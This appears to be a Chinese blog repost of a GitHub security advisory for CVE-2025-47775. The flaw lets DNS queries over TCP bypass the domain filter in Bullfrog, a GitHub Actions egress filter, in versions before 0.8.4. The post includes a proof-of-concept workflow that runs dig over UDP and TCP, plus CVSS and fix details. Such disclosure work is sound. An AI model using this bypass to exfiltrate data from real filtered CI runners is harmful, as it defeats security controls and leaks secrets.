牛蛙DNS安全漏洞:利用TCP协议绕过域名过滤

本文详细分析了GitHub安全公告中披露的CVE-2025-47775漏洞。该漏洞存在于Bullfrog的域名过滤机制中,允许攻击者通过DNS over TCP协议绕过安全策略,实现数据外泄。文章包含漏洞描述、PoC验证代码及修复版本信息。

漏洞详情

CVE-ID: CVE-2025-47775 GHSA-ID: GHSA-m32f-fjw2-37v3 漏洞包: bullfrogsec/bullfrog (GitHub Actions) 受影响版本: < 0.8.4 已修复版本: 0.8.4 严重程度: 中等 (CVSS评分: 6.2) 发布日期: 2025年5月14日 最后更新: 2025年5月15日

漏洞描述

摘要

使用TCP协议会破坏阻断机制,并允许通过DNS进行数据外泄。

概念验证(PoC)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
name: test
on:
  push:
    branches:
      - "*"

jobs:
  testBullFrog:
    runs-on: ubuntu-22.04
    steps:
      - name: 使用谷歌DNS
        run: |
          sudo resolvectl dns eth0 1.1.1.1
          resolvectl status
      - name: 设置Bullfrog以阻断所有流量
        uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2
        with:
           egress-policy: block
           allowed-domains: |
             *.github.com
      - name: 测试连通性
        run: |
          echo 测试允许的UDP连接..
          dig api.github.com @1.1.1.1 || :
          echo 测试允许的TCP连接..
          dig api.github.com @1.1.1.1 +tcp || :

          echo 测试不允许的UDP连接
          dig api.google.com @1.1.1.1 || :
          echo 测试不允许的TCP连接
          dig api.google.com @1.1.1.1 +tcp || :

影响

沙盒绕过。

技术细节

CVSS v3.1 基本指标

  • 攻击向量: 本地 (AV:L)
  • 攻击复杂度: 低 (AC:L)
  • 所需权限: 无 (PR:N)
  • 用户交互: 无 (UI:N)
  • 范围: 未改变 (S:U)
  • 机密性影响: 高 (C:H)
  • 完整性影响: 无 (I:N)
  • 可用性影响: 无 (A:N)

完整向量: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

弱点分类

  • CWE-ID: CWE-201
  • 弱点描述: 在发送的数据中插入敏感信息 - 代码将数据传输给另一个参与者,但部分数据包含了不应被该参与者访问的敏感信息。

参考链接

  1. GHSA-m32f-fjw2-37v3
  2. https://nvd.nist.gov/vuln/detail/CVE-2025-47775
  3. bullfrogsec/bullfrog@ae7744a
  4. https://github.com/bullfrogsec/bullfrog/releases/tag/v0.8.4

信用

报告者: vin01

额外信息

  • EPSS评分: 0.057% (第18百分位)
  • 此分数估计了该漏洞在未来30天内被利用的概率
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计